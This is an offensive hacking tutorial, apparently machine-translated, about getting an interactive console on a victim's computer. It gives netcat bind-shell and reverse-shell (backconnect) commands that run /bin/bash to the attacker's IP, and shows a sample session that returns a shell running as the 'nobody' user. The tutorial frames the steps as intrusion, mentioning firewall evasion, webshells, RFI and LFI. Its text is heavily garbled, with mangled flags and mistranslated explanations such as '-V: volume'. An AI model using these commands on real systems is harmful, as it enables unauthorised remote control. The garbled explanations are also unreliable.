What is a remote connection?
In the title I wrote “Interactive Console” in parentheses. Yes, indeed this is aq intent. Remote connection is a remote connection to a host / computer to get an interactive console from a remote computer that we are through certain ports have been opened. So as if we are directly in front of our computers and we open the remote console application. But in this case, we are at a distance and use our computers, while the console that we get, connected directly to the target computer, so we wrote a command-type command is sent out directly to the target computer, this is the interactive console.
Get Console!
Getting interactive console is very important in doing the hacking. In addition danketepatan speed, we are also more freely send commands to the target computer, more freely, more freely, and a little log. With the interactive console, we can jump to another session in the same computer, eg to log into the mysql server, root exploits, etc..
Many ways, techniques, methods, tactics, tricks, and strategies to get the console remotely. Starting from the webshell, RCE, LFI, RFI, or by sending ninjas into the target computer to help us do a remote connection.
There are two ways that we can do to get this interactive console. Namely bindshell, and backconnect.
BindShell
Bindshell is to open a port (bindings) on a victim’s computer
to include service / application that will serve the connections in the reply received from a port in the open. Generally the application in use is / bin / bash. So when there is a connection to the antecedent open port, then the victim’s computer to run applications / bin / bash and launch it to the attacker. Called bindshell because bind in
do with providing service shell (/ bin / bash). Thus, an attacker who connects to the port in bind those who, will get a / bin / bash from the victim’s computer. It is a interactive console.
# BindShell with netcat
With netcat, we can open ports to make the listening port on the victim’s computer. Attribute-l in included in the command netcat to create a listening port.
nc-v-l-p [port]-e [service / application]
example:. / nc-v-l-p 4444-e / bin / bash &
-V: volume. Shows the volume of the server when the connection.
-L: listening mode (waiting for connection)
-P: open ports
-E: set of service / user application
After successfully opening the shell port (listening port) we shoot our way dr PC
nc-vv [ip shell] [port]
BackConnect
Backconnect is doing a remote from the target computer to our computers. If it had bindshell is remote from our computer to the target computer, if backconnect behind, from the target computer to our computers. Backconnect bindshell is an alternative if it fails, because ntah not have access, denied access, sekurity of the firewall, or because the target computer is covered by the proxy server (the target computers within the network covered by the proxy). If there is a proxy in front of the target computer, although the bind is successful, but we still can not do remote connect to the target because the enclosed proxy computer.
When we connect, the connection we will be rejected because the port that we are headed is not open on the firewall. Firewall rejects all connections / requests to ports that are not opened in the firewall. The packages containing the request sent by the attacker can not pass through the wall of the firewall because it does not open lane, so the connection request never reached the target computer.
# Backconnnect with Netcat
To be able to do backconnect, then we used to be ip public ip, or ip is connected directly to the internet without a proxy barrier .. How to do backconnect very easy, as easy as bindshell. What we need to do first is to set listening mode on our computers. Just set listening mode, without any application, because we will accept applications that are launched by the target company.
[Root @ localhost] [/ root] nc-VLP 6888
listening on [any] 6888 …
Company we are already listening. Next we connect the target computer to our computers by launching the application / bin / bash. As usual, there must be a netcat on the target company. Downloadkan used netcat to the target company. Keep in reply writable directory. Or immediately wrote to / tmp. Command for backconnect are:
nc-vv [attacker ip] [port]-e [launch user application]
example:. / nc 192.168.10.20 6888-vv-e / bin / bash
After running these commands on the target computer, now look at our computer. We’ve got a connection back from the target computer and immediately accept applications that was launched by the target computer to our computers.
[Root @ localhost] [/ root] nc-VLP 6888
listening on [any] 6888 …
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 43 886
id
uid = 48 (nobody) gid = 48 (nobody) groups = 48 (nobody)
uname-a
Astra.2014.ws Linux 2.6.18-164.el5 # 1 SMP Wed Sep 3 03:28:30 EDT 2009
x86_64 x86 _64 x86_64 GNU / Linux
* Bold text: are what commands we type.
credits: gameover ‘n Array